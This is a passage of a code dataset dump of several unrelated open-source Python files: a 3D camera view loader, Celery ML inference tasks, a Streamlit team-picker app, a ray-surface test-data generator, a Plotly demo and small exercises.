Image\nfrom rembg.bg import remove\nimport io\nimport torch\nfrom torchvision import transforms\n\nfrom normal_nds.nds.core import Camera\n\nclass View:\n \"\"\" A View is a combination of camera and image(s).\n\n Args:\n color (tensor): RGB color image (WxHx3)\n mask (tensor): Object mask (WxHx1)\n camera (Camera): Camera associated with this view\n device (torch.device): Device where the images and camera are stored\n \"\"\"\n\n def __init__(self, color, mask, camera, view_angle=0, orthographic=True, device='cpu'):\n self.color = color.to(device)\n self.mask = mask.to(device)\n self.camera = camera.to(device)\n self.view_angle = view_angle\n self.orthographic = orthographic\n self.device = device\n\n def to_world(normal_cam, view_angle,):\n '''\n normal_cam : [4, h, w] tensor. normal map in camera view \n view_angle: yaw angle of camera view in degree\n '''\n view_angle = torch.deg2rad(torch.tensor(view_angle))\n rot = torch.tensor([[torch.cos(view_angle), 0, torch.sin(view_angle)],\n [0, 1, 0],\n [-torch.sin(view_angle), 0, torch.cos(view_angle)]], dtype=normal_cam.dtype, device=normal_cam.device)\n mask = normal_cam[3, :, :] >= 0\n normal_world = normal_cam.clone()\n normal_world[:3, mask] = torch.einsum('ij, jk->ik', rot.T, normal_cam[:3, mask])\n\n return normal_world\n\n @classmethod\n def load_icon(cls, image_path, scale, center, ortho_ratio=0.4, res=512, view_angle=0, camera_depth=1.6, device='cpu'):\n \"\"\"\n Set approximated orthographic cameras.\n We assume the mesh is\n (1) centered to the pelvis(0th joint), which means the camera axis goes through the pelvis,\n (2) scaled to the height of 180, which means the mesh occupies 450 out of 512 images with ortho_ratio=0.4\n reference: https://github.com/YuliangXiu/ICON/\n \"\"\"\n\n camera = Camera.camera_with_angle(scale=scale, center=center,\n view_angle=view_angle, \n device=device)\n\n # Load the color\n color = (Image.open(image_path))\n num_ch = len(color.split())\n if num_ch == 3: # without alpha channel\n # clear background\n buf_front = io.BytesIO()\n color.save(buf_front, format='png')\n color = Image.open(io.BytesIO(remove(buf_front.getvalue()))).convert(\"RGBA\")\n color_t = transforms.ToTensor()(color)\n color_world = (0.5 * (cls.to_world(2 * color_t - 1, int(view_angle)) + 1)).permute(1, 2, 0)\n \n # Extract the mask\n if color_world.shape[2] == 4:\n mask = color_world[:, :, 3:]\n else:\n mask = torch.ones_like(color_world[:, :, 0:1])\n\n color_world = color_world[:, :, :3]\n\n return cls(color_world, mask, camera, view_angle=view_angle, orthographic=True, device=device) \n\n @classmethod\n def load_smpl_mask(cls, smpl_image, scale, center, ortho_ratio=0.4, res=512, view_angle=0, camera_depth=1.6, device='cpu'):\n ortho_ratio = ortho_ratio * (512 / res)\n y = np.deg2rad(int(view_angle))\n R = np.array([[np.cos(y), 0, np.sin(y)],\n [0, 1, 0],\n [-np.sin(y), 0, np.cos(y)]])\n\n t = -np.dot(R, center + np.array([0, 0, camera_depth]))\n\n K = np.identity(3)\n K[0, 0] = 2.0 * scale / (res * ortho_ratio)\n K[1, 1] = 2.0 * scale / (res * ortho_ratio)\n K[2, 2] = 0.001 # 2 / (zFar - zNear), following ICON rendering code : zFar=100, zNear=-100\n camera = Camera(K, R, t, orthographic=True, device=device)\n \n # Extract the mask\n mask = smpl_image[:, :, 3:]\n\n return cls(smpl_image, mask, camera, view_angle=view_angle, orthographic=True, device=device) \n\n @classmethod\n def load_dvr(cls, image_path, cameras_path=None, view_angle=0, device='cpu'):\n \"\"\" Load a view from a given image path.\n\n The paths of the camera matrices are deduced from the image path. \n Given an image path `path/to/directory/foo.png`, the paths to the camera matrices\n in numpy readable text format are assumed to be `path/to/directory/foo_k.txt`, \n `path/to/directory/foo_r.txt`, and `path/to/directory/foo_t.txt`.\n\n Args:\n image_path (Union[Path, str]): Path to the image file that contains the color and optionally the mask\n device (torch.device): Device where the images and camera are stored\n \"\"\"\n\n image_path = Path(image_path)\n\n # Load the camera\n if cameras_path is None:\n cameras_path = image_path.parent.parent / \"cameras.npz\"\n if cameras_path.is_file():\n cam = np.load(cameras_path)\n frame_num = cam[image_path.name]\n pose = cam[\"pose_\"+str(frame_num)]\n R = pose[:3, :3]\n t = pose[:3, 3]\n K = cam[\"intrinsic_\"+str(frame_num)]\n else:\n K = np.loadtxt(image_path.parent / (image_path.stem + \"_k.txt\"))\n R = np.loadtxt(image_path.parent / (image_path.stem + \"_r.txt\"))\n t = np.loadtxt(image_path.parent / (image_path.stem + \"_t.txt\"))\n camera = Camera(K, R, t)\n \n # Load the color\n color = torch.FloatTensor(np.array(Image.open(image_path)))\n color /= 255.0\n \n # Extract the mask\n if color.shape[2] == 4:\n mask = color[:, :, 3:]\n else:\n mask = torch.ones_like(color[:, :, 0:1])\n\n color = color[:, :, :3]\n\n return cls(color, mask, camera, view_angle=view_angle, device=device)\n \n @classmethod\n def load_co3d(cls, image_path, mask_path, pose, intrinsic, mask_threshold, device='cpu'):\n \"\"\" Load co3d images.\n \"\"\"\n\n image_path = Path(image_path)\n mask_path = Path(mask_path)\n\n # Load the camera\n K = intrinsic\n R = pose[:3, :3]\n t = pose[:3, 3]\n camera = Camera(K, R, t)\n \n # Load the color\n color = torch.FloatTensor(np.array(Image.open(image_path)))\n color /= 255.0\n \n # Extract the mask\n if color.shape[2] == 4:\n mask = color[:, :, 3:]\n else:\n mask = torch.ones_like(color[:, :, 0:1])\n\n color = color[:, :, :3]\n \n # Extract the mask\n mask = torch.FloatTensor(np.array(Image.open(mask_path)))\n mask /= 255.0\n if len(mask.shape) < 3:\n mask = mask.unsqueeze(-1)\n else:\n mask = mask[:, :, 0].unsqueeze(-1)\n mask_type = mask.dtype\n mask = (mask > mask_threshold).type(mask_type)\n\n # Exclude black image\n y, x = np.where(mask[:, :, 0])\n if len(x) != 0 and len(y) != 0:\n return cls(color, mask, camera, device=device)\n else:\n None\n\n def to(self, device: str = \"cpu\"):\n self.color = self.color.to(device)\n self.mask = self.mask.to(device)\n self.camera = self.camera.to(device)\n self.device = device\n return self\n\n @property\n def resolution(self):\n return (self.color.shape[0], self.color.shape[1])\n \n def scale(self, inverse_factor):\n \"\"\" Scale the view by a factor.\n \n This operation is NOT differentiable in the current state as \n we are using opencv.\n\n Args:\n inverse_factor (float): Inverse of the scale factor (e.g. to halve the image size, pass `2`)\n \"\"\"\n \n scaled_height = self.color.shape[0] // inverse_factor\n scaled_width = self.color.shape[1] // inverse_factor\n\n scale_x = scaled_width / self.color.shape[1]\n scale_y = scaled_height / self.color.shape[0]\n \n self.color = torch.FloatTensor(cv2.resize(self.color.cpu().numpy(), dsize=(scaled_width, scaled_height), interpolation=cv2.INTER_LINEAR)).to(self.device)\n self.mask = torch.FloatTensor(cv2.resize(self.mask.cpu().numpy(), dsize=(scaled_width, scaled_height), interpolation=cv2.INTER_NEAREST)).to(self.device)\n self.mask = self.mask.unsqueeze(-1) # Make sure the mask is HxWx1\n\n self.camera.K = torch.FloatTensor(np.diag([scale_x, scale_y, 1])).to(self.device) @ self.camera.K \n \n def transform(self, A, A_inv=None):\n \"\"\" Transform the view pose with an affine mapping.\n\n Args:\n A (tensor): Affine matrix (4x4)\n A_inv (tensor, optional): Inverse of the affine matrix A (4x4)\n \"\"\"\n\n if not torch.is_tensor(A):\n A = torch.from_numpy(A)\n \n if A_inv is not None and not torch.is_tensor(A_inv):\n A_inv = torch.from_numpy(A_inv)\n\n A = A.to(self.device, dtype=torch.float32)\n if A_inv is not None:\n A_inv = A_inv.to(self.device, dtype=torch.float32)\n\n if A_inv is None:\n A_inv = torch.inverse(A)\n\n # Transform camera extrinsics according to [R'|t'] = [R|t] * A_inv.\n # We compose the projection matrix and decompose it again, to correctly\n # propagate scale and shear related factors to the K matrix, \n # and thus make sure that R is a rotation matrix.\n R = self.camera.R @ A_inv[:3, :3]\n t = self.camera.R @ A_inv[:3, 3] + self.camera.t\n\n if self.orthographic:\n self.camera.R = R\n self.camera.t = t\n else:\n P = torch.zeros((3, 4), device=self.device)\n P[:3, :3] = self.camera.K @ R\n P[:3, 3] = self.camera.K @ t\n K, R, c, _, _, _, _ = cv2.decomposeProjectionMatrix(P.cpu().detach().numpy())\n c = c[:3, 0] / c[3]\n t = - R @ c\n\n # ensure unique scaling of K matrix\n K = K / K[2,2]\n \n self.camera.K = torch.from_numpy(K).to(self.device)\n self.camera.R = torch.from_numpy(R).to(self.device)\n self.camera.t = torch.from_numpy(t).to(self.device)\n \n def project(self, points, depth_as_distance=False):\n \"\"\" Project points to the view's image plane according to the equation x = K*(R*X + t).\n\n Args:\n points (torch.tensor): 3D Points (A x ... x Z x 3)\n depth_as_distance (bool): Whether the depths in the result are the euclidean distances to the camera center\n or the Z coordinates of the points in camera space.\n \n Returns:\n pixels (torch.tensor): Pixel coordinates of the input points in the image space and \n the points' depth relative to the view (A x ... x Z x 3).\n \"\"\"\n\n # \n points_c = points @ torch.transpose(self.camera.R, 0, 1) + self.camera.t\n pixels = points_c @ torch.transpose(self.camera.K, 0, 1)\n pixels = pixels[..., :2] / pixels[..., 2:]\n depths = points_c[..., 2:] if not depth_as_distance else torch.norm(points_c, p=2, dim=-1, keepdim=True)\n return torch.cat([pixels, depths], dim=-1)\n","repo_name":"snuvclab/chupa","sub_path":"src/normal_nds/nds/core/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":11295,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"21"} +{"seq_id":"31862851331","text":"class sieunhangao:\n suc_manh = 100100\n def __init__(self, para_ten, para_vukhi, para_mau):\n self .ten = \"sieu nhan \" + para_ten\n self .vukhi = para_vukhi\n self .mau = para_mau\nclass sieunhanx(sieunhangao) :\n suc_manh = 20000\n def __init__(self, para_ten, para_vukhi, para_mau,para_thu):\n #self .ten = \"sieu nhan \" + para_ten\n #self .vukhi = para_vukhi\n #self .mau = \n super().__init__(para_ten, para_vukhi, para_mau )\n self .thu = para_thu\n\n\nsieu_nhan_con = sieunhanx('do','vang','xanh','5831')\nprint(sieu_nhan_con.__dict__)","repo_name":"chauhoagnhat/Hoc-Lap-Trinh","sub_path":"oop_4.py","file_name":"oop_4.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13812913767","text":"import importlib\nimport logging\nfrom celery import Task\nimport os\nfrom typing import List, Any, Dict\n\nfrom .worker import app\n\n\nclass ModelInferenceTask(Task):\n \"\"\"\n Abstraction of Celery's Task class to support loading ML model.\n \"\"\"\n\n abstract = True\n\n def __init__(self):\n super().__init__()\n self.model = None\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Load model on first call (i.e. first task processed)\n Avoids the need to load model on each task request\n \"\"\"\n if not self.model:\n logging.info(\"Loading Model...\")\n module_import = importlib.import_module(self.path[0])\n model_obj = getattr(module_import, self.path[1])\n self.model = model_obj(**self.model_args)\n logging.info(\"Model loaded\")\n return self.run(*args, **kwargs)\n\n\n@app.task(\n ignore_result=False,\n bind=True,\n base=ModelInferenceTask,\n path=(\"ml_worker_app.transcribe\", \"WhisperModel\"),\n model_args={\n \"name\": \"base\",\n \"language\": \"\",\n \"device\": \"cpu\",\n },\n name=\"{}.{}\".format(__name__, \"Whisper\"),\n)\ndef whisper_inference(\n self, data: List[int], task=\"transcribe\", language=None\n) -> Dict[str, Any]:\n \"\"\"\n Transcribe audio data using the Whisper model\n \"\"\"\n\n return self.model.predict([data], task=task, language=language) | {\"task\": task}\n\n\n@app.task(\n ignore_result=False,\n bind=True,\n base=ModelInferenceTask,\n path=(\"ml_worker_app.TTS\", \"TTSModel\"),\n model_args={\n \"tts_model\": \"speechbrain/tts-tacotron2-ljspeech\",\n \"vocoder_model\": \"speechbrain/tts-hifigan-ljspeech\",\n \"device\": \"cpu\",\n },\n name=\"{}.{}\".format(__name__, \"TTS\"),\n)\ndef text_to_speech(self, text: str | List[str]) -> Dict[str, Any]:\n \"\"\"\n Synthesize speech from text using the TTS model(s)\n \"\"\"\n return self.model.predict(text)\n\n\n@app.task(\n ignore_result=False,\n bind=True,\n base=ModelInferenceTask,\n path=(\"ml_worker_app.gpt\", \"GPTModel\"),\n model_args={\n # \"openai_api_key\": os.environ.get(\"OPENAI_API_KEY\"),\n \"model_name\": \"text-curie-001\",\n },\n name=\"{}.{}\".format(__name__, \"GPT\"),\n)\ndef gpt_prompt(\n self, text: str, source_language: str, target_language: str\n) -> Dict[str, Any]:\n \"\"\"\n Synthesize speech from text using the TTS model(s)\n \"\"\"\n return self.model.predict(text, source_language, target_language)\n","repo_name":"MoPl90/Speech_Translator","sub_path":"model_server/ml_worker_app/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70119525814","text":"import plotly.graph_objects as go\n\nfig = go.Figure()\n\n# Create scatter trace of text labels\nfig.add_trace(go.Scatter(\n x=[1.5, 3],\n y=[2.5, 2.5],\n text=[\"Rectangle reference to the plot\",\n \"Rectangle reference to the axes\"],\n mode=\"text\",\n))\n\n# Set axes properties\nfig.update_xaxes(range=[0, 4])\nfig.update_yaxes(range=[0, 4])\n\n# Add shapes\nfig.add_shape(type=\"rect\",\n xref=\"x\", yref=\"y\",\n x0=2.5, y0=0,\n x1=3.5, y1=2,\n line=dict(\n color=\"RoyalBlue\",\n width=3,\n ),\n fillcolor=\"LightSkyBlue\",\n)\nfig.add_shape(type=\"rect\",\n xref=\"paper\", yref=\"paper\",\n x0=0.25, y0=0,\n x1=0.5, y1=0.5,\n line=dict(\n color=\"LightSeaGreen\",\n width=3,\n ),\n fillcolor=\"PaleTurquoise\",\n)\n\nfig.show()","repo_name":"ebtrader/corefinta_scratchpad","sub_path":"forecasted_weekly_candle/forecasted_with_different_assumptions/rect.py","file_name":"rect.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23889919898","text":"from string import digits\r\nimport random\r\nimport streamlit as st\r\nimport pandas as pd\r\n\r\ndef intersection(lst1, lst2):\r\n lst3 = [value for value in lst1 if value not in lst2]\r\n return lst3\r\n# callback function to change the random number stored in state\r\ndef change_player_numbers():\r\n st.session_state[\"random_nos\"] = random.sample(range(len_of_refined_list),len_of_refined_list)\r\n return\r\nst.set_page_config(page_title=\"pick my players\")\r\ncolstitle1,colstitle2,colstitle3 = st.columns(3)\r\ncolstitle2.title(\"PMP v1.0\")\r\ncolstitle2.text(\"Pick My Players\")\r\nm = st.markdown(\"\"\"\r\n\"\"\", unsafe_allow_html=True)\r\n\r\nget_players_names = st.text_area(\"Enter Player Names: \",\"\")#\r\nif get_players_names != \"\":\r\n get_players_names_raw = get_players_names.split('.')[1:]\r\n #print(get_players_names_raw)\r\n get_players_names_refined = []\r\n for player_name_raw in get_players_names_raw:\r\n remove_digits = str.maketrans('', '', digits)\r\n res = player_name_raw.translate(remove_digits)\r\n get_players_names_refined.append(res.replace(\" \",\"\"))\r\n print(get_players_names_refined)\r\n if len(get_players_names_refined) >= 8:\r\n len_of_refined_list = len(get_players_names_refined)\r\n game = st.selectbox('Game Type',['8 v 8','7 v 7','6 v 6','5 v 5','4 v 4'])\r\n \r\n if game == '8 v 8':\r\n game_no = 8\r\n elif game == '7 v 7':\r\n game_no = 7\r\n elif game == '6 v 6':\r\n game_no = 6\r\n elif game == '5 v 5':\r\n game_no = 5\r\n elif game == '4 v 4':\r\n game_no = 4\r\n else:\r\n game_no = 0\r\n \r\n col1button, col2button, col3button = st.columns(3)\r\n if game_no*2 > len(get_players_names_refined):\r\n col2button.write(\"Select a different\\n\\nGame Type,\\nPlayers are Less\")\r\n else:\r\n ## button to generate a new random player_numbers\r\n col2button.button(\"Generate Team Captain Names and Player Nos\", on_click=change_player_numbers)\r\n # initializing with a random number\r\n #if \"random_nos\" not in st.session_state:\r\n #st.session_state[\"random_nos\"] = []#random.sample(range(len_of_refined_list),len_of_refined_list)\r\n \r\n try:\r\n random_nos = st.session_state.random_nos\r\n generate_player_number_random = {}\r\n for idx,player_name in enumerate(get_players_names_refined):\r\n generate_player_number_random[random_nos[idx]] = player_name\r\n remove_list = [0,1]\r\n\r\n get_players_key = [i for i in list(generate_player_number_random.keys()) if i not in remove_list]#list(generate_player_number_random.keys())\r\n\r\n p1 = []\r\n p2 = []\r\n col1, col2 = st.columns(2)\r\n with col1:\r\n st.subheader(\"Team 1 Captain : \"+generate_player_number_random[0])\r\n p1 = st.multiselect(generate_player_number_random[0]+\" Pick \"+str(game_no-1)+\" Player #'s\",get_players_key, key = \"p1\")\r\n #st.write('You selected:', p1)\r\n\r\n with col2:\r\n st.subheader(\"Team 2 Captain : \"+generate_player_number_random[1])\r\n if len(p1) == game_no-1:\r\n p2 = st.multiselect(generate_player_number_random[1]+\" Pick \"+str(game_no-1)+\" Player #'s\",intersection(get_players_key,p1), key = \"p2\")\r\n else:\r\n p2 = st.multiselect(generate_player_number_random[1]+\" Pick \"+str(game_no-1)+\" Player #'s\",[], key = \"p2\")\r\n #st.write('You selected:', p2)\r\n get_selected_player_1_team = {}\r\n get_selected_player_2_team = {}\r\n for p_1 in p1:\r\n get_selected_player_1_team[p_1] = generate_player_number_random[p_1]\r\n for p_2 in p2:\r\n get_selected_player_2_team[p_2] = generate_player_number_random[p_2]\r\n if len(p1) == len(p2):\r\n col1show, col2show, col3show = st.columns(3)\r\n if col2show.button(\"Show Players\"):\r\n team1 = pd.DataFrame(get_selected_player_1_team.items(), columns=['Players #', 'Players Names'])\r\n col1.table(team1)\r\n team2 = pd.DataFrame(get_selected_player_2_team.items(), columns=['Players #', 'Players Names'])\r\n col2.table(team2)\r\n st.balloons()\r\n else:\r\n col2show.text(\"\")\r\n except:\r\n st.write(\"Click On Generating Team Captain Names and Players Nos\")\r\n else:\r\n st.write(\"Please Enter @ Least 8 Players\")\r\nwith st.expander(\"How to Use the App\"):\r\n colstep1, colstep2, colstep3 = st.columns(3)\r\n colstep1.text(\"Copy Final List\\nFrom WhatsApp Group and\\npaste in the text area, as shown\\nbelow: \\nSunday 6-8pm \\nPlace - Turfside - booked\\n\\n1. player I \\n2. player II \\n3. player III \\n4. player IV \\n5. player V \\n6. player VI \\n7. player VII \\n8. player VIII \\n9. player IX \\n10. player X \\n11. player XI \\n12. player XII \\n13. player XIII \\n14. player XIV +I \\n15. player XV \\n\\nWaitlist \\n1. player M\")\r\n colstep3.text(\"Delete\\nDate, Waitlist Location,\\nJust Keep\\nthe Main Players, as shown\\nbelow: \\n\\n1. player I \\n2. player II \\n3. player III \\n4. player IV \\n5. player V \\n6. player VI \\n7. player VII \\n8. player VIII \\n9. player IX \\n10. player X \\n11. player XI \\n12. player XII \\n13. player XIII \\n14. player XIV +I \\n15. player XV\")\r\n st.text(\"Click on Button to Generate Captain and Player Numbers\")\r\n st.text(\"Team Captain 1 can pick his/her Players based on the Game Type\")\r\n st.text(\"Team Captain 2 Can ONLY pick his/her Players\\nafter Team Captain 1 [Option will be available then]\")\r\n","repo_name":"sohailehiz/team_selector","sub_path":"player_select.py","file_name":"player_select.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38987582555","text":"import numpy as np\nimport os\nimport time\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom numpy import array\n\n#Configuration parameters\n#------------------------------\n#- surface intervals\nx_min, x_max = 100, 3100\ny_min, y_max = 200, 2700\n#- number of triangles and rays\ndefault_num_triangles = 30000\ndefault_num_rays = 10000000\n#- enable/disable visualisation\nvisualise_surface = True\n#------------------------------\n\n#define spatial frequencies (w = 2*pi*f) for surface undulation\nw = 2 * np.pi * np.array(\n [0.0487, 0.0912,\n 0.0125, 0.0318,\n 0.00672, 0.00543,\n 0.00196, 0.00282,\n 0.000571, 0.000386,\n 0.000345, 0.000571,\n 0.000251, 0.000145,\n 0.000208, 0.000139])\n\n#method to compute surface elevation using an analytic expression\ndef f_xy(x, y):\n return 1 * (np.cos(w[0]*x) + np.cos(w[1]*y)) \\\n + 2 * (np.cos(w[2]*x - 0.3*np.pi) + np.cos(w[3]*y - 0.7*np.pi)) + \\\n + 2.5 * (np.cos(w[4]*x + 1.2*np.pi) + np.cos(w[5]*y - 1.83*np.pi)) + \\\n - 1.8 * (np.cos(w[6]*x + 2.93*np.pi) + np.cos(w[7]*y - 0.67*np.pi)) + \\\n + 5 * (np.cos(w[8]*x + 0.04*np.pi) + np.cos(w[9]*y - 1.05*np.pi)) + \\\n + 25 * (np.cos(w[10]*x - 0.61*np.pi) + np.cos(w[11]*y + 0.51*np.pi)) + \\\n + 4 * (np.cos(w[12]*x - 0.61*np.pi) * np.cos(w[13]*y + 0.51*np.pi)) + \\\n + 1.3 * (np.cos(w[14]*x * w[15]*y + 0.12*np.pi)) + \\\n + 3 * np.sin(0.642*w[15]*y - 0.573*w[14]*x)\n\n#method to plot mesh surface\ndef draw_mesh_surface(vertices, triangles, heading=None,\n rgb_base=np.r_[0,0,1], colornoise=0.35, randseed=4562):\n fig = plt.figure(figsize=(8,6))\n ax = fig.add_subplot(111, projection='3d')\n mesh_polys = [[vertices[t] for t in tri] for tri in triangles]\n np.random.seed(randseed)\n fc = (1 - colornoise) * rgb_base + colornoise * np.random.rand(len(triangles),3)\n ax.add_collection3d(Poly3DCollection(mesh_polys, facecolors=fc, linewidths=1))\n xyz_min = np.min(vertices, axis=0)\n xyz_max = np.max(vertices, axis=0)\n ax.set_xlim(xyz_min[0], xyz_max[0])\n ax.set_ylim(xyz_min[1], xyz_max[1])\n ax.set_zlim(xyz_min[2], xyz_max[2])\n if heading is not None:\n plt.title(heading)\n\n#method to locate triangles well inside the surface\ndef well_within_boundary(centroids, x_min, x_range, y_min, y_range, percent):\n return (centroids[:,0] > x_min + percent * x_range) & \\\n (centroids[:,0] < x_min + (1 - percent) *x_range) & \\\n (centroids[:,1] > y_min + percent * y_range) & \\\n (centroids[:,1] < y_min + (1 - percent) * y_range)\n\n#API for creating a surface and saving the data in binary format\ndef synthesize_data(outdir,\n n_triangles_approx=default_num_triangles,\n n_rays=default_num_rays,\n show_graphics=True,\n save_results_in_binary=True,\n skip_ground_truth=False,\n perturb_centroid=False,\n feedback=dict()):\n x_range = x_max - x_min\n y_range = y_max - y_min\n aspect = y_range / x_range\n n_vertices_approx = int(n_triangles_approx / 2)\n\n #discretisation\n nX = int(np.sqrt(n_vertices_approx / aspect))\n nY = int(aspect * nX)\n xi = np.linspace(x_min, x_max, nX)\n yi = np.linspace(y_min, y_max, nY)\n delta = min(xi[1] - xi[0], yi[1] - yi[0])\n #add some noise to perturb xy coordinates\n np.random.seed(7065)\n noise_x = 0.25 * delta * (np.random.rand(nX) - 0.5)\n noise_y = 0.25 * delta * (np.random.rand(nY) - 0.5)\n xi += noise_x\n yi += noise_y\n\n #create mesh surface\n vertices = []\n triangles = []\n for y in yi:\n for x in xi:\n vertices.append([x, y, f_xy(x,y)])\n\n for y in range(nY-1):\n for x in range(nX-1):\n #vertices are ordered consistently in clockwise direction\n triangles.append([y*nX+x, y*nX+x+1, (y+1)*nX+x])\n triangles.append([y*nX+x+1, (y+1)*nX+x+1, (y+1)*nX+x])\n\n vertices = np.array(vertices, dtype=float)\n vertices[:,-1] -= min(vertices[:,-1])\n triangles = np.array(triangles, dtype=int)\n\n feedback['nVertices'] = len(vertices)\n feedback['nTriangles'] = len(triangles)\n feedback['nRays'] = n_rays\n\n if show_graphics:\n draw_mesh_surface(vertices, triangles, 'Simulated surface')\n plt.show()\n\n #compute centroids and normal vectors for surface patches\n centroids = []\n normals = []\n for t in triangles:\n n = np.cross(vertices[t[1]] - vertices[t[0]],\n vertices[t[2]] - vertices[t[0]])\n normals.append(n / np.linalg.norm(n))\n centroids.append(np.mean(vertices[t], axis=0))\n\n normals = np.array(normals)\n centroids = np.array(centroids)\n if perturb_centroid:\n np.random.seed(9571)\n a1 = 0.2 * (np.random.rand(n_rays) - 0.5)\n a2 = 0.2 * (np.random.rand(n_rays) - 0.5)\n for i, t in enumerate(triangles):\n centroids[i] += a1[i] * (vertices[t[1]] - vertices[t[0]]) \\\n + a2[i] * (vertices[t[2]] - vertices[t[0]])\n\n #create rays\n #idea: Line segment starts from \"centroid - (k/2) * normal\"\n # and extends for distance k*rand() in the normal direction.\n # In the end, about half will intersect the surface.\n #- rand() generates random variates in union{(0,0.498],[0.502,1]}\n # introduce deadzone (0.498,0.502) to make the result unambiguous.\n def rand(n):\n r = np.random.rand(n)\n r[r < 0.5] *= 0.996\n r[r >= 0.5] = 0.502 + (r[r >= 0.5] - 0.5) * 0.996\n return r\n\n np.random.seed(8215)\n r = rand(n_rays)\n s = 0.6 + 0.4 * np.random.rand(n_rays) #stochastic segment length scaling factor\n t = np.random.randint(len(triangles), size=n_rays) #random triangle selections\n rayFrom = []\n rayTo = []\n lower = []\n upper = []\n crossing = []\n max_segment_length = 4 * delta\n magnitude = max_segment_length * s\n lower = -0.5 * magnitude\n upper = r * magnitude\n rayFrom = centroids[t] + lower[:,np.newaxis] * normals[t]\n rayTo = rayFrom + upper[:,np.newaxis] * normals[t]\n crossing = np.array(r > 0.5, dtype=np.int32)\n\n if show_graphics:\n M = min(200, n_rays)\n #- visualise first 200 rays relative to surface\n plt.plot([range(M), range(M)], [lower[:M], lower[:M] + upper[:M]])\n plt.plot([0,M], [0,0], 'k')\n plt.title('Illustration: Rays that cross the surface rise above y=0')\n plt.show()\n #- cdf\n plt.plot(np.sort(r), np.arange(n_rays)/n_rays)\n plt.ylabel('cdf')\n plt.xlabel('r')\n plt.title(r\"y(r=0.5) $\\rightarrow$ proportion of rays that don't intersect the surface\")\n plt.axis('tight')\n plt.grid(True)\n plt.show()\n #- show some rays piercing through the surface\n '''\n from mpl_toolkits.mplot3d.art3d import Line3DCollection\n draw_mesh_surface(vertices, triangles, 'Some rays (red) intersecting, (green) not intersecting the surface')\n for c,v in zip(['g', 'r'], [0, 1]):\n margin = 0.2 if v == 1 else 0\n idx = np.where((crossing == v) & well_within_boundary((rayFrom + rayTo)/2.,\n x_min, x_range, y_min, y_range, margin))[0][:25]\n ls = np.hstack([rayFrom[idx], rayTo[idx]]).copy()\n ls = ls.reshape((-1,2,3))\n lc = Line3DCollection(ls, linewidths=2, colors=c)\n plt.gca().add_collection(lc)\n plt.gca().scatter(rayTo[idx,0], rayTo[idx,1], rayTo[idx,2], c=c)\n plt.show()\n '''\n\n #shift the coordinates to anonymise data and preserve precision as float32\n xyz_min = np.min(vertices, axis=0)\n vertices -= xyz_min\n rayFrom -= xyz_min\n rayTo -= xyz_min\n\n #write data to bin files\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n fw = lambda f: os.path.join(outdir, f)\n t0 = time.time()\n verts = np.array(vertices.flatten(),'float32')\n tris = np.array(triangles.flatten(),'int32')\n pFrom = np.array(rayFrom.flatten(),'float32')\n pTo = np.array(rayTo.flatten(),'float32')\n with open(fw('vertices_f32'), 'wb') as f:\n verts.tofile(f)\n with open(fw('triangles_i32'), 'wb') as f:\n tris.tofile(f)\n with open(fw('rayFrom_f32'), 'wb') as f:\n pFrom.tofile(f)\n with open(fw('rayTo_f32'), 'wb') as f:\n pTo.tofile(f)\n t1 = time.time()\n print('Essential files written in {}s'.format(t1 - t0))\n '''\n np.savetxt(fw('vertices.csv'), verts, delimiter=',', fmt='%.6f')\n np.savetxt(fw('triangles.csv'), tris, delimiter=',', fmt='%d')\n np.savetxt(fw('rayFrom.csv'), pFrom, delimiter=',', fmt='%.6f')\n np.savetxt(fw('rayTo.csv'), pTo, delimiter=',', fmt='%.6f')\n '''\n if skip_ground_truth:\n return\n print('Saving ground-truth...')\n if save_results_in_binary:\n with open(fw('ground_truth'), 'wb') as f:\n crossing.tofile(f)\n if perturb_centroid:\n intercepts = centroids[t] - xyz_min\n intercepts[crossing==0] = 0\n intersect_triangle = t\n intersect_triangle[crossing==0] = -1\n with open(fw('intercepts'), 'wb') as f:\n np.array(intercepts.flatten(),'float32').tofile(f)\n with open(fw('intersect_triangle'), 'wb') as f:\n np.array(intersect_triangle.flatten(),'int32').tofile(f)\n else:\n np.savetxt(fw('ground_truth.csv'), crossing, fmt='%d', delimiter=',')\n\n\nif __name__ == \"__main__\":\n outdir = os.path.join(os.getcwd().replace('scripts', 'input'))\n synthesize_data(outdir, visualise_surface)\n","repo_name":"acfr/gpu-ray-surface-intersection-in-cuda","sub_path":"scripts/input_synthesis.py","file_name":"input_synthesis.py","file_ext":"py","file_size_in_byte":9691,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"29255060428","text":"from turtle import*\r\nfrom math import*\r\nfrom random import*\r\npenup()\r\nr=[]\r\ndef radius(n,m):#n=꼭짓점의 갯수,m=한변의 길이\r\n return (m/2)*(1/(sin(pi/n)))\r\n\r\ndef is_pile_up(x1,y1,r1,x2,y2,r2):\r\n if x1==x2 and y1==y2:#x좌표와 y좌표가 같은경우\r\n return False\r\n n=sqrt((x2-x1)**2+(y2-y1)**2)\r\n if n>abs(r1-r2) and nabs(r1+r2) or n b_mean)[0]\n edge_pattern[edge_indices] = 1\n \n return edge_pattern\n\n####################################\n# 3.1.1 - Categorization of Blocks #\n####################################\n\ndef get_q_value(block):\n \"\"\"\n Finds the q value (number of pixels in a block higher than the block mean)\n \"\"\"\n\n mean = block_mean(block)\n q_value = np.where(block > mean)[0].shape[0]\n \n return q_value\n\ndef get_q_prime_value(block):\n \"\"\"\n Comutes q prime value (number of edge pixels in a nonedge block)\n\n Parameters\n ----------\n edge_pattern: array of shape (N, )\n The edge pattern for the non-edge block\n\n Returns\n -------\n q_prime: float\n The number of edge pixels in the nonedge block\n \"\"\"\n 